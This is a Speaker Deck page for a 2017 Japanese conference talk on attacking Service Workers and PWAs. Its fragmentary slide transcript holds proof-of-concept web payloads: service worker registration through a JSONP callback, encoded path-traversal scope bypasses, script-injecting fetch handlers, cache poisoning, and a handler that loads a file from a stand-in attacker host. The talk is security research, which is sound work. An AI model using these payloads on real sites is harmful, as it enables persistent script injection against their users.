Upgrade to Pro — share decks privately, control downloads, hide ads and more …

攻撃者視点で見る Service Worker / PWA Study SW

Sponsored · Ship Features Fearlessly Turn features on and off without deploys. Used by thousands of Ruby developers.
Avatar for Masato Kinugawa Masato Kinugawa
September 14, 2017
Technology
20
27k

攻撃者視点で見る Service Worker / PWA Study SW

PWA Study( https://web-study.connpass.com/event/65267/ ) で発表した資料です。

Avatar for Masato Kinugawa

Masato Kinugawa

September 14, 2017
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
Avatar for Masato Kinugawa masatokinugawa
0
690
Shadow DOM & Security - Exploring the boundary between light and shadow
Avatar for Masato Kinugawa masatokinugawa
1
1.9k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
4.2k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.6k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
23k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
7.1k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
100k

Other Decks in Technology

See All in Technology
ランサムウェア対策としてのpnpm導入のススメ
Avatar for Satoru Ishikawa ishikawa_satoru
0
140
Claude_CodeでSEOを最適化する_AI_Ops_Community_Vol.2__マーケティングx_AIはここまで進化した.pdf
Avatar for 小笠原理久 riku_423
2
580
Oracle Base Database Service 技術詳細
Avatar for oracle4engineer oracle4engineer
PRO
15
93k
GitHub Issue Templates + Coding Agentで簡単みんなでIaC/Easy IaC for Everyone with GitHub Issue Templates + Coding Agent
Avatar for AEON aeonpeople
1
240
Webhook best practices for rock solid and resilient deployments
Avatar for Guillaume Laforge glaforge
1
290
フルカイテン株式会社 エンジニア向け採用資料
Avatar for FULL KAITEN fullkaiten
0
10k
今日から始める Amazon Bedrock AgentCore
Avatar for Har1101 har1101
4
410
AIと新時代を切り拓く。これからのSREとメルカリIBISの挑戦
Avatar for ktykogm 0gm
0
2.1k
こんなところでも(地味に)活躍するImage Modeさんを知ってるかい?- Image Mode for OpenShift -
Avatar for Masataka Tsukamoto tsukaman
0
140
プロダクト成長を支える開発基盤とスケールに伴う課題
Avatar for yuu26 yuu26
4
1.3k
Introduction to Sansan, inc / Sansan Global Development Center, Inc.
Avatar for Sansan, Inc. sansan33
PRO
0
3k
日本の85%が使う公共SaaSは、どう育ったのか
Avatar for たけだ taketakekaho
1
230

Featured

See All Featured
How to audit for AI Accessibility on your Front & Back End
Avatar for davetheseo davetheseo
0
180
How Software Deployment tools have changed in the past 20 years
Avatar for Geshan Manandhar geshan
0
32k
Measuring Dark Social's Impact On Conversion and Attribution
Avatar for Stephen Akadiri stephenakadiri
1
130
Into the Great Unknown - MozCon
Avatar for Noah Learner thekraken
40
2.3k
Practical Tips for Bootstrapping Information Extraction Pipelines
Avatar for Matthew Honnibal honnibal
25
1.7k
Are puppies a ranking factor?
Avatar for Jono Alderson jonoalderson
1
2.7k
How To Stay Up To Date on Web Technology
Avatar for Chris Coyier chriscoyier
791
250k
Agile Leadership in an Agile Organization
Avatar for Dr. Kim W Petersen kimpetersen
PRO
0
83
The Art of Delivering Value - GDevCon NA Keynote
Avatar for David Neal reverentgeek
16
1.8k
From π to Pie charts
Avatar for Rasagy Sharma rasagy
0
120
Leading Effective Engineering Teams in the AI Era
Avatar for Addy Osmani addyosmani
9
1.6k
Neural Spatial Audio Processing for Sound Field Analysis and Control
Avatar for NII S. Koyama's Lab skoyamalab
0
170

Transcript

  1. None
  2. None

  3. • •

  4. • • • <script> navigator.serviceWorker.register("/sw.js") </script>

  5. • • •

  6. • • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23

  7. None

  8. HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});

  9. <script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]

    onfetch=event=>console.log('fetch')//({});

  10. <script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw

    = "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>

  11. • •

  12. • • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':

    'text/html'}}; e.respondWith(new Response(body,init)); }

  13. • • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>

  14. • • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:

    "/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}

  15. HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]

  16. https://example.com/api/jsonp https://example.com/api%2Fjsonp

  17. ❝ ❞

  18. https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F

  19. None

  20. • • •

  21. onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •

  22. <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016

  23. ❝ ❞

  24. <script src="//example.com/socialbutton.js"></script>

  25. self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });

    }); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }

  26. • •

  27. onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)

    { if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };

  28. <script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};

    request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>

  29. <script> document.write(localStorage.getItem('name')); </script>

  30. • • •

  31. • • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"

  32. GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:

    no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6

  33. • •

  34. None
  35. None